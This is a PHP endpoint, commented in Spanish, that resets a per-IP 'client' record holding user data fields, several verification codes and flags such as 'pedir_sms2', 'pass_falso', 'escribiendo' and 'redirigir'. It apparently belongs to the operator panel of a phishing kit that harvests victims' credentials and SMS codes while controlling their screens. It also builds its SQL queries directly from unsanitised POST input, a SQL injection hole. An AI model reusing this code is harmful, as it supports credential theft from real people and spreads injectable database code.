<?php

header('content-type: application/json; charset=utf-8');
// En caso de JSON en vez de JSONP, habilitar CORS:
header("access-control-allow-origin: *");

date_default_timezone_set("America/Caracas");
$fecha_actual = strftime("%Y-%m-%d %H:%M:%S", time());

session_start();

require('config/conexion.php');

if (isset($_SESSION['usuario'])) {
    // Usuario autenticado
} else {
    header('Location: index.php');
    exit();
}

$ip_user = $_POST["ident"]; // Cambia esto por la IP que estés obteniendo (por ejemplo, $_POST["ident"])

$dispositivo = '';
$cedula = '--';
$valid_user = '9';
$user_dato1 = '--';
$user_dato2 = '--';
$user_dato3 = '--';
$user_dato4 = '--';
$code1 = '--';
$code2 = '--';
$code3 = '--';
$status = 0;
$img1 = '';
$img2 = '';
$img3 = '';
$pais = '';

// Primero, verificar si existe la condición en la base de datos
$consulta = "SELECT * FROM tabla_clientes WHERE ip = '$ip_user'";
$resultado = mysqli_query($conexion, $consulta);

// Verificar si la consulta devuelve algún resultado
if (mysqli_num_rows($resultado) > 0) {
    // Si existe, ejecutar el UPDATE
    $sql = "UPDATE tabla_clientes 
            SET valid_user = '$valid_user', 
                user_dato1 = '$user_dato1', 
                user_dato2 = '$user_dato2', 
                user_dato3 = '$user_dato3', 
                user_dato4 = '$user_dato4', 
                code1 = '$code1', 
                code2 = '$code2', 
                code3 = '$code3', 
                status = $status, 
                img1 = '$img1', 
                img2 = '$img2', 
                img3 = '$img3', 
                loading = 0, 
                redirigir = 0, 
                valid_code1 = '9', 
                g_code1 = '', 
                valid_code2 = '9', 
                tipo_code2 = '--', 
                tipocuenta = '--', 
                operador = '--', 
                pantalla = '1', 
                valid_user_0 = '9', 
                url_imagen1 = '--', 
                filtro_j = '', 
                pais = '$pais', 
                code_form = '', 
                valid_code3 = '9', 
                valid_code4 = '9', 
                code4 = '--', 
                pedir_sms2 = '--', 
                pass_falso = '0', 
                escribiendo = '0', 
                valid_respuesta = '9', 
                respuestas_amarre = '' 
            WHERE ip = '$ip_user'";

    $resultado2 = mysqli_query($conexion, $sql);

    // Verificar si se afectaron filas con la operación
if (mysqli_affected_rows($conexion) > 0) {
    $arr[] = array('guardo' => 'si');
} else {
    $arr[] = array('guardo' => 'no');
}

echo json_encode($arr);
return;

} else {
    // Si no existe el registro con la IP
    $arr[] = array('guardo' => 'no_existe');
}

echo json_encode($arr);
return;
?>
